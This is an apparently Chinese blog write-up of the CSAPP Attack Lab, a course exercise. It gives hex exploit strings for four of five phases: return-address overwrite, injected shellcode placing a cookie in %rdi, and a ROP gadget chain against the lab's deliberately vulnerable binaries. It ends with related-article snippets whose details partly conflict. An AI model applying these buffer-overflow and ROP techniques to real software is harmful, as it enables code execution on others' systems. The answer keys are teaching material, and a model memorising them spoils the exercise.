CSAPP-Attack lab

最新推荐文章于 2025-01-15 15:35:07 发布
原创 最新推荐文章于 2025-01-15 15:35:07 发布 · 274 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#操作系统

文章目录

此实验有五个任务

在这里插入图片描述

第一个任务

这个任务的内容是跳转到touch1函数

void test(){
	int val;
	val = getbuf();
	printf("No exploit. Getbuf returned 0x%x\n", val);
}

unsigned getbuf() {
	char buf[BUFFER_SIZE];
	Gets(buf);
	return 1;
}

void touch1() {
	vlevel = 1;
	printf("Touch1!: You called touch1()\n");
	validate(1);
	exit(0);
}

解题思路: 1.找到touch1()的起始地址、2.修改 test()调用getbuf()时 压入的返回地址为touch1()的起始地址。

步骤一:
objdump -d ctarget ctarget.d
vim ctarget.d
:/touch1

很容易找到touch1()的起始地址为:0x00000000004017c0
在这里插入图片描述

步骤二:
利用缓冲区溢出来来修改retq地址
vim ctarget.d
:/getbuf
可得到%rsp-28得到字符数组的首地址,0x28即40字节(40B),即BUFFER_SIZE

在这里插入图片描述

一个char是1B,则需要输入40个字符才能缓冲区溢出,
可以使用以下去检验
./ctarget -q
aaaa ...分别输入39和40个字符

可以知道输入40个字符时已经缓冲区溢出。

先给出答案:
弄个result.txt:
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
c0 17 40 00 00 00 00 00

./hex2raw < result.txt | ./ctarget -q
可看到成功通过第一个任务。

原因是:函数调用时,会把返回地址压栈,再进入函数,40个f之后,缓冲区满了,接下来的输入是为了顶掉原来的返回地址(这里是小端存储),所以(0x00000000004017c0表示为 0xc017400000000000),hex2raw函数是为了生成攻击字符串,只需要我们输入我们的结果,它便自动生成相应ascii码。

第二个任务

带参数跳cookie转到touch2,
答案:

ff ff ff ff ff ff ff ff
48 c7 c7 fa 97 b9 59
68 ec 17 40 00
c3
ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
80 dc 61 55 00 00 00 00

48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi
68 ec 17 40 00       	pushq  $0x4017ec
c3                   	retq

字符串首地址是0x5561dc78,这里的意思是,跳转到字符串中间,中间是我们写的代码(你需要自己写汇编语言,然后反汇编查看它的代码)。这里的意思是将cookie放入rdi,然后把返回地址压栈,接着retq跳转到压栈的地址。

第三个任务

将你的cookie转化成字符串,并带着字符串首地址跳转到touch3
答案:

48 c7 c7 a8 dc 61 55
68 fa 18 40 00
c3
ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
78 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61 00

第三题也是注入代码,将 cookie 的字符串的地址传入函数,注入代码和第二题类似,但是注意因为> 第三题中,后续操作会将 buf 栈中的 40 个字节覆盖了,所以不能将字符串存储中这里,改为存储在调用函数前的栈中,通过打断点得到其栈顶地址是 0x5561dca0 。所以应该把字符串存入的地址设为 0 x5561dca8 ,这个地址在输入的 16 进制中就紧跟着跳转的地址。
注入的代码(已经反编译了):

48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi
68 fa 18 40 00          pushq  $0x4018fa
c3                      retq

第四个任务

查阅文档, 48 89 c7 就是 movq %rax,%rdi ,就将栈上的值存入了 %rdi ,因此将 cookie > 值存入栈中,就可以传值,这段代码地址是 0x4019a2
因此输入字符串先是一段填充的 40 字节,然后是跳转地址,设为 pop 的地址 0x4019ab ,接着存入 cookie 值(就是将要 pop 的那个值,注意应存入 64 位值),然后是 mov 的地址 0x4019a2 ,> 最后跳转到 touch2 ,这样一个完整的 ROP 攻击链就形成了,一个可行的答案就是:

ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
a2 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00

第五个任务

CSAPP——Lab3——AttackLab
zheyuan的博客
12-02 4002
本篇文章是CSAPP配套实验的第三个,基于缓冲区溢出的攻击实验,和前面的bomb lab同属一章,它们都属于机器级编程这一章的内容,前面的bomb lab是为了阅读和理解汇编语言代码,而这个实验则是为了理解过程调用和x86栈帧结构。 首先还是以吐槽开头,这个实验文件还是从学校系统里下载的,但是很多东西有问题甚至是误导性的。学校将原本的栈缓冲区大小改为了12个字节,并把原版代码包中的hex2raw程序改成了sendstring(迷惑行为,这个函数后来被证明是有问题的),同时做的PPT语焉不详。哦对,这个实验用
CSAPP-Lab03 Attack Lab 详细解析
qq_25591221的博客
03-05 1万+
目录实验概览Part 1: Code Injection AttacksPhase 1分析反汇编`test`反汇编`getbuf`SolutionPhase 2分析注入代码栈帧讲解SolutionPhase 3分析注入代码栈帧讲解SolutionPart 2: Return-Oriented ProgrammingPhase 4分析栈帧讲解SolutionPhase 5分析栈帧讲解Solution总结 纸上得来终觉浅,绝知此事要躬行 实验概览 Attack!,成为一名黑客不正是我小时候的梦想吗?这个实验
CSAPP-Attack-Lab
H-ZeX Coding Life
09-16 678
CSAPP Attack Lab 本文所有答案都是传给hex2raw的文本,hex2raw会在转换好的字符串后添加换行符,所以答案里没有换行符 第一题答案aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa /*
Attack Lab
jokerMingge的博客
10-23 857
从下载完所需实验包后,内有官方文档以及.tar压缩包,使用解压后,得到如下文件kinclude:attacksattacks我们还是将答案保存在answer.txt,这里运行要用-q,(参考官方文档)毕竟不是 CMU 的学生,-q的作用:。这次的 lab 要仔细看官方的文档,里面是题目的要求,也包含解题指导,对解决问题很有帮助。这次 lab 就是输入攻击字符串,实现调用函数等目的,包含了对栈破坏,注入代码,ROP 攻击等方法,说明了栈溢出的危害。这里要使用。
计算机系统基础实验 AttackLab
凌阳的博客
06-18 3266
本文是作者的作业备份,仅作参考,不可照搬抄袭!本实验分为五个阶段,ctarget的三个使用的是CI(code-injection),rtarget的两个阶段使用的是ROP(return-oriented-programming),如表1所示ctarget和rtarget都是用getbuf函数从标准输入读入字符串,getbuf函数定义如下:函数Gets类似于标准库函数gets,从标准输入读入一个字符串(以’\n’或者end-of-file结束),将字符串(带null结束符)存储在指定的目的地址。从这段代码可以
CSAPP: Attacklab
Rachel_IS的博客
11-21 2591
命运多舛的attacklab 从上周卡到今天,愣是卡死在phase2 一度以为这次要gg了… 不过今天心理学课灵感大开!!瞬间写完!!开心???????????????? 来总结一下曲折的经历叭~ 这个lab真的能让人学会很多gdb的操作 先objdump -d 出需要的反汇编代码 先简要描述一下这个lab在干什么: 有一个函数getbuf通过调用Gets 获得你输入的字符串,你可以利用栈溢出修改返回地址和进行一系列操...
CSAPP-LAB3-Attack
Dallas01的博客
02-20 1704
文章目录00 PrerequisitePart 1: Code injection1.1 phase_11.2 phase_21.3 phase_3Part2: Returned-Oriented Programming2.1 phase_42.2 Phase_5 00 Prerequisite 听见课堂上老爷子说: But to be a good person you also know what the bet have to know what the bad people do, so part
深入理解计算机系统(CSAPPattack-lab详解
独小雪的博客
07-30 2560
深入理解计算机系统(CSAPPattack-lab详解 下载实验用的程序戳这里 戳这里下载实验说明 开始 target1里的两个程序,ctraget和rtarget,都有缓冲区溢出的bug。实验要求我们做的,是利用这些bug,让程序通过缓冲区溢出,执行我们想执行的代码。下载的文件夹里,ctarget是做代码注入攻击 (code-injection attacks) 用的。rtarget,还有后面的cookie.txt、hex2raw、farm.c都和后面的ROP攻击(return-oriented-pr
CMU CSAPP : Decoding lab
weixin_55196798的博客
11-04 1685
该项目来源于CMU(卡内基·梅隆大学 Carnegie Mellon University)的课程CSAPP中的 exercise 原说明 You have just intercepted an encoded message. The message is a sequence of bits which reads as follows in hexadecimal: 6363636363636363724646636F6D6F72 466D203A65693A7243646E206F5
CSAPPAttack Lab —— 缓冲区溢出攻击实验
热门推荐
-Silvia、
06-05 4万+
CSAPPAttack Lab —— 缓冲区溢出攻击实验 X86-64寄存器和栈帧 Part I:Code Injection Attacks Part II:Return-Oriented Programming Attacks
CSAPP Lab3 attacklab实验源材料
11-07
CSAPP Lab3 attacklab实验源材料 深入理解计算机系统实验三缓冲区溢出攻击实验源材料
CSAPP AttackLab
qq_45775304的博客
09-01 567
欢迎前往我的github的CSAPP仓库,含各章家庭作业解答,各实验原始数据及题解和CSAPP电子书等,如果对您的学习有所帮助,能点个star就更好不过了 也欢迎访问我的个人博客,不定期分享一些学习心得 Level 1 Phase 1是一个简单直白的攻击,作为后续攻击的热身,只需照着说明手册上的提示一步步跟着做,即可将其破解 首先反汇编touch1()函数,获其地址为0x4017c0 (gdb) disassemble touch1 Dump of assembler code for func
3-Attack Lab
qq_38966867的博客
07-22 332
3-Attack Lab 1. level 1 利用栈溢出覆盖getbuf函数的返回地址 答案 前五行是正常写入buf的数据,第六行是touch1的地址0x4017c0,用于覆盖getbuf()函数的正常返回地址。注意写入的数据不能是0x0a,这个数字表述“\n”,Get()函数遇到0xa会终止。 2. level 2 注入可执行代码 那么如何让程序去执行我们的代码呢?既然我们可以向栈中写入任意内容并且可以设置返回时跳转到的地址,那么我们就可以通过在栈中写入指令,再令从getbuf函数返回的地址为我们栈
CSAPP Lab3:Attack Lab
倪多多的博客
05-16 1万+
该实验是《深入理解计算机系统》(英文缩写CSAPP)课程附带实验——Lab3:Attack Lab,和Lab 2:Bomb Lab都对应书中第三章内容(程序的机器级表示),该实验分为代码注入或面向返回的编程两部分,进行缓冲区溢出攻击。
CSAPPAttackLab
朝花夕拾
11-03 2万+
这份史上最全的CSAPPAttackLab实验讲解汇总绝对是攻克这一难题的最佳利器!无论你是刚刚踏入计算机科学的大门,还是已经是一位经验丰富的程序员,这万字详解都将对你产生深远的影响。从最基础的概念到高级的技巧,每一个步骤都被超全面、超详细地剖析。这篇文章是你攻克CSAPP AttackLab的不二之选,不容错过!收藏它,它将成为你的最佳学习伴侣,引领你通往计算机科学的精彩世界!
CSAPP-ATTACKLAB
qq_36300268的博客
07-31 650
BOMBLAB 做的人不能自理。在bomblab中,有很多投机取巧的方法,面对整个冗长的汇编也没能总结出什么有用的经验(或许有用的gdb调试经验增加了。。。)总而言之,bomblab算一个比较有趣但是要想真正写点东西出来又很困难的LAB。废话了这么多,无非就是:“我做完bomblab但是台麻烦拉不想写,直接从attacklab开始整” ...
【计算机系统基础】AttackLab实验
m0_74125616的博客
01-15 2743
基于ASCII对照表查找cookie值0x55fd3f95的十六进制数,具体是“35 35 66 64 33 66 39 35”,基于阶段二rsp的地址分析,考虑将cookie放入缓冲区后首地址递推0x10的位置,即cookie的text地址为0x556785b8。也就是需要代码注入了。如下图9所示,打开ctarget.s文件查询“touch3”,查看touch3的首地址为401a62,并发现攻击字符串中需要包含cookie字符串的表示,考虑转为ASCII十六进制数字并衔接“0”字节,使得语法成立。
Attack Lab----深入理解计算机系统
weixin_53016579的博客
04-23 3315
阅读(writeup)文件,可以知道该实验分为两大部分。书ctarget是易受代码注入攻击的可执行程序,利用 代码注入(Code injection) 攻击该程序rtarget是易受面向返回的编程攻击的可执行程序,利用 返回导向编程(Return-oriented programming) 攻击该程序另外,如果在 ubuntu 系统上直接运行这两个程序,是无法运行的,因为服务器没有使用 CMU 的内网,无法建立连接。如下在中也提供了解决方法,如下运行程序时,传入命令参数-h可以打印可能的命令行参数列表;
CSAPP attacklab
weixin_43409270的博客
07-15 614
CSAPP attacklab attacklab总共有5个小实验,主要是围绕CSAPP这本书的3.10节内容展开,即缓冲区溢出攻击。 缓冲区溢出攻击:调用其他过程时当前%rip会存放在运行时栈上,通过缓冲区漏洞,可以修改ret时的%rip,使其指向恶意代码处。 实验的第一部分有3个小实验,主要是在ctarget上完成,代码没有任何缓冲区溢出保护:主要指每次运行ctarget,栈地址是不变的,所以code-injection(CI)十分容易进行。 主要方法是利用gdb调试工具,查看运行时栈的地址,然后就可以
csapp attack lab过程
最新发布
06-25
CSAPP(Computer Systems: A Programmer's Perspective)课程中的 Attack Lab 是一个关于程序安全和漏洞利用的经典实验,主要目的是让学生理解缓冲区溢出攻击的原理以及如何通过代码注入或重定向执行流来实现特定功能。该实验通常分为多个阶段,从简单的栈溢出到更复杂的代码注入攻击。 ### 实验环境准备 Attack Lab 通常需要在 Linux 环境下运行,并使用 `gdb`、`objdump`、`hexedit` 等工具进行逆向分析和调试。实验中会提供一个可执行文件和若干目标函数,如 `touch1`、`touch2` 和 `touch3`,每个阶段的目标是将控制流转移到这些函数并传入正确的参数值(通常是某个 cookie 值)[^1]。 --- ### 阶段一:基本栈溢出(Phase 1) 第一阶段的目标是触发缓冲区溢出,将返回地址覆盖为 `touch1` 函数的地址。步骤如下: 1. **获取函数地址**: 使用 `objdump -d ctarget > ctarget.asm` 获取反汇编信息,查找 `touch1` 的地址。 2. **构造 payload**: 在 `farm.c` 中找到用于输入的缓冲区大小(通常是 56 字节),然后填充 56 字节的 NOP 指令(例如 `\x90`),接着写入 `touch1` 的地址(小端序格式)。 3. **验证执行**: 使用 `make test` 或 `./ctarget -i exploit.txt` 运行 payload 文件,确认是否成功跳转至 `touch1`。 --- ### 阶段二:带参数的函数调用(Phase 2) 第二阶段要求将指定的 cookie 值(如 `0x59b997fa`)作为参数传递给 `touch2` 函数,并跳转至其地址(如 `0x4017ec`)[^1]。 1. **分析 touch2 函数**: 查看 `touch2` 的汇编代码,确认其期望的参数是存储在寄存器 `rdi` 中。 2. **构造 ROP 链**: 使用 `popq %rdi; ret` 指令(称为 gadget)将 cookie 值压入 `rdi` 寄存器,随后跳转至 `touch2` 地址。 3. **生成 payload**: 构造如下结构: ``` [padding (56 bytes)] → [address of popq rdi gadget] → [cookie value] → [address of touch2] ``` 4. **测试与调试**: 使用 `gdb` 调试程序,观察栈布局是否正确,确保寄存器 `rdi` 的值被正确设置。 --- ### 阶段三:代码注入攻击(Phase 3) 第三阶段要求直接注入一段自定义的机器码(shellcode),修改程序行为,最终跳转至 `touch3` 并传入正确的 cookie 字符串。 1. **编写 shellcode**: 编写一小段汇编代码,将 cookie 值(如 `0x59b997fa`)转换为字符串并将其地址放入 `rdi`。 2. **汇编与提取机器码**: 使用 `gcc -c shellcode.s` 和 `objdump -d shellcode.o` 提取机器码。 3. **构造 payload**: 填充缓冲区后,在栈上注入 shellcode,并跳转至其起始地址。 4. **绕过 NX 保护机制**: 如果系统启用 NX(No-eXecute),则需采用其他方式(如 ROP 技术)完成攻击。 --- ### 工具推荐与调试技巧 - **GDB 调试技巧**: - 使用 `break *main` 设置断点 - 使用 `x/16x $rsp` 查看栈内容 - 使用 `stepi` 单步执行指令 - **常用命令**: ```bash objdump -d ctarget > ctarget.asm gdb ./ctarget ``` - **注意事项**: - 所有地址必须以小端序格式写入 - payload 文件应为二进制格式(可使用 `hexedit` 编辑) ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值